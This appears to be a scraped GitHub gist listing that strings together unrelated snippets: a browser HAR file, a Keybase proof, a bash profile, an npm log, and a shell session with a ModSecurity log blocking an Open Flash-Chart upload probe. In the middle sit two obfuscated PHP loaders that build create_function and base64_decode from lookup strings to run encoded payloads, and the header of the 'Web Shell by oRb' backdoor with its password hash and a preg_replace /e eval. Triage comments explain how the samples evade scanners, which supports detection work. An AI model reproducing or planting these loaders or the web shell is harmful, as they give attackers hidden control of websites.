
@mrengy
mrengy / loop11.har
Created March 27, 2019 19:16
debugging
{
"log": {
"version": "1.2",
"creator": {
"name": "WebInspector",
"version": "537.36"
},
"pages": [
{
"startedDateTime": "2019-03-27T19:01:43.048Z",

Keybase proof

I hereby claim:

  • I am mrengy on github.
  • I am mrengy (https://keybase.io/mrengy) on keybase.
  • I have a public key ASCParVuRflRB_ocL9_X8ZDcGATedpox53UbDvDzMfP_BAo

To claim this, I am signing this object:

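# Load the default .profile, but only when the file exists and is non-empty.
[[ -s "$HOME/.profile" ]] && source "$HOME/.profile"
# Load RVM into a shell session *as a function*, again only when the script is present.
[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm"
# Put /usr/local/bin ahead of everything already on PATH. The export is done
# once: repeating the line only adds a second, redundant PATH entry.
# Because this directory is searched first, any executable placed in it shadows
# a same-named system command, so it should be writable by administrators only.
export PATH="/usr/local/bin:$PATH"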
# Setting PATH for Python 2.7
# The original version is saved in .bash_profile.pysave
0 info it worked if it ends with ok
1 verbose cli [ '/usr/local/bin/node', '/usr/local/bin/npm', 'install' ]
2 info using npm@2.15.1
3 info using node@v4.4.3
4 verbose readDependencies loading dependencies from /Applications/MAMP/htdocs/cg-style/package.json
5 warn package.json cloudgov-style@0.3.4 license should be a valid SPDX license expression
6 verbose install where, deps [ '/Applications/MAMP/htdocs/cg-style',
6 verbose install [ 'uswds',
6 verbose install 'autoprefixer',
6 verbose install 'browserify',
<?php
// Obfuscated PHP sample: no function name appears literally in this file.
// $UCk is a 30-character lookup string, and the three variables below are
// assembled from it one character at a time by index.
// The $var{N} string-offset syntax was deprecated in PHP 7.4 and removed in
// PHP 8.0, so the file as written only parses on older interpreters.
// Triage note: a search for the plain function names will not match this file.
// The visible indicator is a long run of `$x{N} . $x{N}` concatenations that is
// later called as a variable function.
$UCk = 'm;efvlwsiq6hgnu_xcoyzbr4ajkdtp';
// Indexes 7,28,22,15,22,2,29,5,24,17,2 spell "str_replace".
$u7 = $UCk{7} . $UCk{28} . $UCk{22} . $UCk{15} . $UCk{22} . $UCk{2} . $UCk{29} . $UCk{5} . $UCk{24} . $UCk{17} . $UCk{2};
// Indexes 21,24,7,2,10,23,15,27,2,17,18,27,2 spell "base64_decode".
$p6 = $UCk{21} . $UCk{24} . $UCk{7} . $UCk{2} . $UCk{10} . $UCk{23} . $UCk{15} . $UCk{27} . $UCk{2} . $UCk{17} . $UCk{18} . $UCk{27} . $UCk{2};
// Indexes 17,22,2,24,28,2,15,3,14,13,17,28,8,18,13 spell "create_function",
// which builds a callable from a string of PHP source (removed in PHP 8.0).
// The statements that follow call these three through the variables: they strip
// $UCk{1} (";") and newlines from a string literal, base64-decode the result
// and hand it to create_function, so the decoded text is executed as code.
$a5m = $UCk{17} . $UCk{22} . $UCk{2} . $UCk{24} . $UCk{28} . $UCk{2} . $UCk{15} . $UCk{3} . $UCk{14} . $UCk{13} . $UCk{17} . $UCk{28} . $UCk{8} . $UCk{18} . $UCk{13};
$h2n = $a5m( '$R9T,$zr', $p6($u7( array($UCk{1}, "\n"), "", "JHIgP;SAnJzt;mb3IoJGk9M;DskaTx;zdHJsZ;W4oJF;I5VCk7JGkr;Kyl7;JGM9b3JkK;HN1Yn;N0ci;gkUjlU;LC
AkaS;kpOyRjLT1;vcmQoc3Vi;c3Ry;KCR6ciw;oKCRpKz;EpJX;N0cmxlb;igkenI;pKSk;pOyRyL;j1jaHIoYWJ;z
KCRjKSAmI;DB4RkYpO3;1yZXR1cm4g;JHI7" )) );
$tn = $a5m( "", $h2n($p6($u7( array($UCk{1}, "\n"), "", "S9urlr;S74Yxo;trWjxLvd2;G7Hv;6W1k;I/Ypuu6ZMD;C0M2vrma;YuLfh16bn;g4qknJyc;aJyBP;1p6trCQtY
e;Bo7GW;0LDabZJwk;4/Fs+Wnrn;h/qm5L;2buj;s8rY0;6+TjJ;Sbv9vQjth;uXlrReYRhk;2aetna;XzbTmq6l4;
<?php
// Obfuscated PHP sample: the function names are never written out. $z1g is a
// 30-character lookup string and each variable below is built from it by
// concatenating single characters selected by index.
// The $var{N} string-offset syntax was deprecated in PHP 7.4 and removed in
// PHP 8.0, so the file as written only parses on older interpreters.
// Triage note: match on the structure (index-built names, then a variable
// function call over a ";"-split base64 string), not on the variable names or
// on the lookup string itself.
$z1g = 'zjxklhcgeoutdiwmp;q6rsy4_navbf';
// Indexes 21,11,20,24,20,8,16,4,26,6,8 spell "str_replace".
$XP = $z1g{21} . $z1g{11} . $z1g{20} . $z1g{24} . $z1g{20} . $z1g{8} . $z1g{16} . $z1g{4} . $z1g{26} . $z1g{6} . $z1g{8};
// Indexes 28,26,21,8,19,23,24,12,8,6,9,12,8 spell "base64_decode".
$e3W = $z1g{28} . $z1g{26} . $z1g{21} . $z1g{8} . $z1g{19} . $z1g{23} . $z1g{24} . $z1g{12} . $z1g{8} . $z1g{6} . $z1g{9} . $z1g{12} . $z1g{8};
// Indexes 6,20,8,26,11,8,24,29,10,25,6,11,13,9,25 spell "create_function",
// which builds a callable from a string of PHP source (removed in PHP 8.0).
// The statements that follow strip $z1g{17} (";") and newlines from a string
// literal, base64-decode it and pass it to create_function, so the decoded
// text is executed as code.
$G3y = $z1g{6} . $z1g{20} . $z1g{8} . $z1g{26} . $z1g{11} . $z1g{8} . $z1g{24} . $z1g{29} . $z1g{10} . $z1g{25} . $z1g{6} . $z1g{11} . $z1g{13} . $z1g{9} . $z1g{25};
$RU6 = $G3y( '$HF,$Av', $e3W($XP( array($z1g{17}, "\n"), "", "JHIgPSAn;Jztmb3IoJ;Gk9MDska;TxzdHJsZW4;oJEh;GKTs;kaSsr;KXskYz1;vcmQoc;3Vic3RyKCR;IRiwg;JG
kpKTs;kYy09b3J;kKHN1Yn;N0cigkQXY;sKCgkaSs;xKSVz;dHJsZ;W4oJEF2KSk;pKTsk;ci49Y2hy;KGFicygk
Yy;kgJiAw;eEZGKT;t9cmV0dX;JuICRyOw=;=" )) );
$OuM = $G3y( "", $RU6($e3W($XP( array($z1g{17}, "\n"), "", "dJirz6+9yp;JXid25z;L3YpHPCxMi;9pFC60;8PMh9qcp9;e5k3jN;mKfgvr3;Mp4WatH;iQf5Nr;UHhvn6S;5co
e6nr;N/1p+t;lah4;lYqRuOCs;0YCTa1B4sc;3GzaSv3bl4;nsl7;r9q3pb2SW;VDpVXh4;ilCv1GuAwd;2jq+Jz
<?php # Web Shell by oRb
# Plain-text settings header of a PHP web shell (the banner comment above is
# the author's own). Only these assignments are readable; the body that uses
# them is stored encoded in the statement that follows.
# $auth_pass is 32 hexadecimal characters, the length of an MD5 digest.
# NOTE(review): presumably the hash of the shell's access password; confirm
# against the decoded body. For incident response it is a string to search
# other files and hosts for.
$auth_pass = "bdfa762517dbee605ddea6ac0205b3ec";
# The remaining values are not read by any code visible here.
# NOTE(review): presumably UI defaults consumed by the encoded body.
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
# The next statement calls preg_replace() with the pattern "/.*/e". The /e
# modifier makes PHP evaluate the replacement string as code; it was deprecated
# in PHP 5.5 and removed in PHP 7.0. The hex escapes in that replacement spell
# eval(gzinflate(base64_decode(' and the statement is truncated on this page.
# A scan for a literal "eval(" therefore misses this file; the /e modifier and
# the \x-escaped replacement string are the visible indicators.
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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
[thomas-nelson-jr]$ cd mike-eng.com/wp-content/plugins
[thomas-nelson-jr]$ ls
afc-flv-player feed_plugin kimili-flash-embed visual-form-builder
afc-plug-system hits-ie6-pngfix manual-image-crop wordpress-importer
akismet image-rotation-fixer postmash wordpress-meta-robots
batch-categories index.php search-and-replace wpaudio-mp3-player
broken-link-checker jetpack syntax-highlighter
[thomas-nelson-jr]$ cd whatsmyrank-dev
-bash: cd: whatsmyrank-dev: No such file or directory
[thomas-nelson-jr]$ tail -n 10 error.log
[Tue Apr 26 05:22:25 2016] [error] [client 91.200.12.24] ModSecurity: Access denied with code 418 (phase 1). String match "ofc_upload_image.php" at REQUEST_BASENAME. [file "/dh/apache2/template/etc/mod_sec2/99_dreamhost_rules.conf"] [line "236"] [id "1990059"] [msg "Open Flash-Chart RFI"] [hostname "mike-eng.com"] [uri "/wp-content/plugins/whatsmyrank-dev/php-ofc-library/ofc_upload_image.php"] [unique_id "Vx9dgdBx2ycAAH3pi5wAAAAP"]
[thomas-nelson-jr]$
[thomas-nelson-jr]$ for k in `ls -S logs/*/http/access.log`; do wc -l $k | sort -r -n; done
181 logs/mike-eng.com/http/access.log
83 logs/emandmwedding.com/http/access.log
29 logs/stage.mike-eng.com/http/access.log
25 logs/emandminbeantown.com/http/access.log
0 logs/stage.emandminbeantown.com/http/access.log